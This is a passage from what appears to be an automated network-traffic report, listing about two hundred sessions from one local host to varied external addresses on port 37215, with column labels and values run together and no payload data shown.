                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4062192.168.2.1360002157.89.36.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4063192.168.2.133794648.184.126.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4064192.168.2.1358054197.1.160.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4065192.168.2.1354812197.13.160.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4066192.168.2.1334470197.109.145.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4067192.168.2.1356814197.172.235.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4068192.168.2.135229041.124.230.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4069192.168.2.1342860114.16.1.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4070192.168.2.133895241.76.175.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4071192.168.2.134489041.207.128.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4072192.168.2.1353004157.115.51.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4073192.168.2.1340992157.129.73.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4074192.168.2.133920241.20.59.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4075192.168.2.1356326157.97.40.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4076192.168.2.1343132197.45.222.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4077192.168.2.1359060157.109.82.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4078192.168.2.134769441.21.176.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4079192.168.2.1354528157.105.132.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4080192.168.2.135083441.115.39.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4081192.168.2.135099447.79.91.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4082192.168.2.1345768157.94.161.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4083192.168.2.1336650197.255.29.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4084192.168.2.1341124197.31.215.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4085192.168.2.1353552157.13.111.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4086192.168.2.1357750197.239.199.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4087192.168.2.1335322157.86.130.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4088192.168.2.1345184197.188.2.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4089192.168.2.1345322197.90.218.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4090192.168.2.1334476197.81.107.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4091192.168.2.1348952157.45.202.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4092192.168.2.1337302157.65.44.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4093192.168.2.134462696.129.20.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4094192.168.2.1359406157.62.185.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4095192.168.2.135565841.176.81.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4096192.168.2.134023834.238.180.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4097192.168.2.133737441.7.77.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4098192.168.2.135257441.204.86.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4099192.168.2.135092841.128.252.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4100192.168.2.1341936173.4.149.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4101192.168.2.1344688197.186.106.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4102192.168.2.1350208197.198.170.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4103192.168.2.1333672149.158.66.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4104192.168.2.134392441.226.235.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4105192.168.2.134295641.231.155.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4106192.168.2.1352362157.28.132.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4107192.168.2.1342510157.255.193.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4108192.168.2.1334966169.227.225.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4109192.168.2.1342542157.101.211.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4110192.168.2.1354250157.57.199.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4111192.168.2.1336844220.44.53.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4112192.168.2.1342292110.112.168.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4113192.168.2.1347970157.243.106.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4114192.168.2.1336946157.242.174.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4115192.168.2.1336348157.253.75.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4116192.168.2.1344916157.162.105.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4117192.168.2.135380841.235.54.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4118192.168.2.1355380157.107.11.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4119192.168.2.1340842197.188.204.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4120192.168.2.1346242197.24.241.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4121192.168.2.134275265.108.94.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4122192.168.2.136091446.27.246.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4123192.168.2.135486041.191.249.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4124192.168.2.1352304157.29.3.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4125192.168.2.1334976157.219.230.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4126192.168.2.1339184157.8.32.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4127192.168.2.13441284.124.113.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4128192.168.2.134623241.233.219.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4129192.168.2.135876641.183.27.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4130192.168.2.1351108157.111.37.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4131192.168.2.1352564157.93.252.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4132192.168.2.135548641.191.189.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4133192.168.2.135428841.20.213.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4134192.168.2.133706841.135.253.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4135192.168.2.1357516157.18.195.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4136192.168.2.1335538139.151.235.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4137192.168.2.133332441.119.18.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4138192.168.2.1344542197.120.164.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4139192.168.2.1357992157.58.167.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4140192.168.2.134754241.17.231.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4141192.168.2.1360014197.143.130.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4142192.168.2.135511658.120.226.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4143192.168.2.1358390157.76.153.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4144192.168.2.134469041.147.55.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4145192.168.2.1354020197.244.213.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4146192.168.2.135573841.76.152.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4147192.168.2.1354028157.249.144.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4148192.168.2.1356692221.116.169.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4149192.168.2.1356508197.72.27.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4150192.168.2.1347502197.153.116.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4151192.168.2.1340464197.46.6.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4152192.168.2.1343884197.22.206.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4153192.168.2.135685014.186.35.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4154192.168.2.1360656158.102.154.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4155192.168.2.1348466157.30.142.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4156192.168.2.1333580197.153.163.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4157192.168.2.133597612.242.166.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4158192.168.2.1334892209.156.160.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4159192.168.2.1349486104.5.185.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4160192.168.2.1354894165.28.160.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4161192.168.2.1348160202.149.56.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4162192.168.2.1341340145.235.244.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4163192.168.2.1360738197.46.232.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4164192.168.2.1360996157.151.195.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4165192.168.2.1352552197.86.166.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4166192.168.2.1345482197.37.49.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4167192.168.2.1341552145.76.235.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4168192.168.2.135492648.14.190.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4169192.168.2.1339192197.59.199.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4170192.168.2.1339168123.122.179.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4171192.168.2.1357906197.33.0.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4172192.168.2.1336274157.170.131.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4173192.168.2.135103041.51.190.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4174192.168.2.1357380157.69.42.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4175192.168.2.135174286.26.58.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4176192.168.2.1353144157.220.18.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4177192.168.2.1339430157.194.51.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4178192.168.2.1348116157.200.93.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4179192.168.2.1350936157.91.253.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4180192.168.2.1338882197.104.173.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4181192.168.2.1342604197.94.28.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4182192.168.2.1340246114.131.126.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4183192.168.2.134488263.7.42.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4184192.168.2.1334232124.205.177.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4185192.168.2.135997241.49.110.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4186192.168.2.1343170197.109.148.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4187192.168.2.1351768197.222.36.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4188192.168.2.1338044131.81.146.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4189192.168.2.1335038200.147.249.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4190192.168.2.135604825.171.176.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4191192.168.2.1335442113.100.34.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4192192.168.2.134289841.135.186.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4193192.168.2.1357914157.50.58.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4194192.168.2.1359972197.24.132.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4195192.168.2.1355788157.61.72.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4196192.168.2.1347266211.44.2.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4197192.168.2.1336916157.207.83.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4198192.168.2.1349534197.222.252.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4199192.168.2.1357440157.77.226.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4200192.168.2.1353744193.1.143.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4201192.168.2.1350778197.105.202.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4202192.168.2.1348262157.25.251.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4203192.168.2.133327885.157.240.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4204192.168.2.1346040185.211.226.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4205192.168.2.1350934197.143.250.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4206192.168.2.133336641.248.72.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4207192.168.2.1353276197.245.219.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4208192.168.2.1355338197.107.149.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4209192.168.2.1348156197.161.209.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4210192.168.2.134572441.255.104.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4211192.168.2.1360712157.196.168.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4212192.168.2.1338788197.45.94.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4213192.168.2.1337826205.79.60.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4214192.168.2.135845441.213.181.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4215192.168.2.1360294197.174.0.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4216192.168.2.1335188157.166.142.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4217192.168.2.1348026157.200.231.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4218192.168.2.1351048197.207.255.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4219192.168.2.1351672157.153.211.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4220192.168.2.1348930195.172.52.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4221192.168.2.133759241.80.137.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4222192.168.2.1346684157.32.183.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4223192.168.2.1336828157.158.29.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4224192.168.2.1343002197.3.198.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4225192.168.2.135247241.122.139.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4226192.168.2.135569641.20.73.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4227192.168.2.1352784197.20.61.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4228192.168.2.135012880.156.131.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4229192.168.2.1347728197.238.21.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4230192.168.2.1350956183.126.130.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4231192.168.2.13367989.55.128.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4232192.168.2.133559823.50.136.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4233192.168.2.1358704197.21.225.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4234192.168.2.1355796157.136.185.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4235192.168.2.133524441.224.121.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4236192.168.2.134906070.218.117.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4237192.168.2.1351522197.177.133.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4238192.168.2.135626041.159.244.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4239192.168.2.1351636197.219.76.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4240192.168.2.134609042.231.233.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4241192.168.2.134836441.111.66.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4242192.168.2.1346308157.243.245.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4243192.168.2.1355058218.176.7.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4244192.168.2.134948241.55.78.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4245192.168.2.1357686197.118.117.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4246192.168.2.1341534197.27.207.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4247192.168.2.1333952157.41.240.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4248192.168.2.135173441.84.240.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4249192.168.2.1341998157.138.157.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4250192.168.2.134971041.250.96.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4251192.168.2.1359426157.211.99.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4252192.168.2.1340038197.13.182.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4253192.168.2.135257025.158.136.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4254192.168.2.133750241.103.142.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4255192.168.2.1341310157.88.208.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4256192.168.2.1347612157.201.91.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4257192.168.2.1344808157.73.84.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4258192.168.2.134045041.69.210.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4259192.168.2.1349296197.121.95.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4260192.168.2.133891441.43.230.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4261192.168.2.13388689.68.89.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4262192.168.2.135528641.247.174.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4263192.168.2.1359728157.252.72.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4264192.168.2.1337416157.186.61.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4265192.168.2.1343528197.40.104.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4266192.168.2.135860241.205.169.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4267192.168.2.1346218157.66.167.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4268192.168.2.1335746169.42.225.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4269192.168.2.1343496157.15.28.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4270192.168.2.134053241.240.153.037215
                                                  TimestampBytes transferredDirectionData


